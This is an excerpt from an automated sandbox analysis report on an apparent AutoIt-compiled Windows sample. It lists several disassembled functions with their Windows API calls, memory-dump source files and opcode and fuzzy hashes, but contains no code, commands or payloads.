                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ClassName_wcscmp
                                                                                • String ID: #32770
                                                                                • API String ID: 2292705959-463685578
                                                                                • Opcode ID: 53cf4244b9797241f681d618b30ed0327a848bbc6a3078112dee7fa47399b33d
                                                                                • Instruction ID: 2867f6102645ebbbc813b792ed779708e1f3242bdb765a629cedb7c59cb34458
                                                                                • Opcode Fuzzy Hash: 53cf4244b9797241f681d618b30ed0327a848bbc6a3078112dee7fa47399b33d
                                                                                • Instruction Fuzzy Hash: CDE06833A0032827D720EBA5EC0AF97FBACEB51760F000027F905D3041E670E60087E8
                                                                                Function 003EA631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 003EA63F
                                                                                  • Part of subcall function 003D13F1: _doexit.LIBCMT ref: 003D13FB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Message_doexit
                                                                                • String ID: AutoIt$Error allocating memory.
                                                                                • API String ID: 1993061046-4017498283
                                                                                • Opcode ID: 1431c79eb260a582db99bd4cb578de8f36a4c952dcd408311e5e9c162a75ce51
                                                                                • Instruction ID: a9631d17da9d33af3b1121f07bcd07bb668b286b2c5867a276809a93816e103b
                                                                                • Opcode Fuzzy Hash: 1431c79eb260a582db99bd4cb578de8f36a4c952dcd408311e5e9c162a75ce51
                                                                                • Instruction Fuzzy Hash: 4CD02B323C4B2833D31637983C07FC935488B05B95F140027FB0CD95C249E6D94002DD
                                                                                Function 0042AE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetSystemDirectoryW.KERNEL32(?), ref: 0042ACC0
                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0042AEBD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: DirectoryFreeLibrarySystem
                                                                                • String ID: WIN_XPe
                                                                                • API String ID: 510247158-3257408948
                                                                                • Opcode ID: 50209573a36ddf2947f1ec7d834a64c64dfe4b1cac18eb9f6cf9fbfb9be01dd4
                                                                                • Instruction ID: f53a7fd3571eef416ea6af61cc0ce0670dac25354bc2149872936f4a2990821a
                                                                                • Opcode Fuzzy Hash: 50209573a36ddf2947f1ec7d834a64c64dfe4b1cac18eb9f6cf9fbfb9be01dd4
                                                                                • Instruction Fuzzy Hash: AFE06D70D00619DFCB11DBA6E944AEDB7B8AF48300F5080A6E402B2260CB745A94DF2A
                                                                                Function 004186CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004186E2
                                                                                • PostMessageW.USER32(00000000), ref: 004186E9
                                                                                  • Part of subcall function 003F7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 003F7AD0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: FindMessagePostSleepWindow
                                                                                • String ID: Shell_TrayWnd
                                                                                • API String ID: 529655941-2988720461
                                                                                • Opcode ID: bd63150b384b28ca141146d8eaee411aaa86bf98669bb1615ceecc856683b0e6
                                                                                • Instruction ID: ac10161cc0b67a44e2d71bc620bcf6d8465510a23cd8df1860799e0db07847de
                                                                                • Opcode Fuzzy Hash: bd63150b384b28ca141146d8eaee411aaa86bf98669bb1615ceecc856683b0e6
                                                                                • Instruction Fuzzy Hash: 33D02231B803187BF3246730AC0BFC63A189B04B11F101825B306EB1C0C9E0E900C71C
                                                                                Function 00418698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004186A2
                                                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 004186B5
                                                                                  • Part of subcall function 003F7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 003F7AD0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: FindMessagePostSleepWindow
                                                                                • String ID: Shell_TrayWnd
                                                                                • API String ID: 529655941-2988720461
                                                                                • Opcode ID: ed7cab2c9ce31062917cbf922cb89644ae41312dca29b0ca726039f92b1f9538
                                                                                • Instruction ID: e9e68aca34aad13ba6e34f457963c29a483bcaced30748a834b5887c3c26ebc8
                                                                                • Opcode Fuzzy Hash: ed7cab2c9ce31062917cbf922cb89644ae41312dca29b0ca726039f92b1f9538
                                                                                • Instruction Fuzzy Hash: 10D01231B84358B7E7646770AC0BFD67E589B04B11F111825B74AAB1D0C9E4E950C758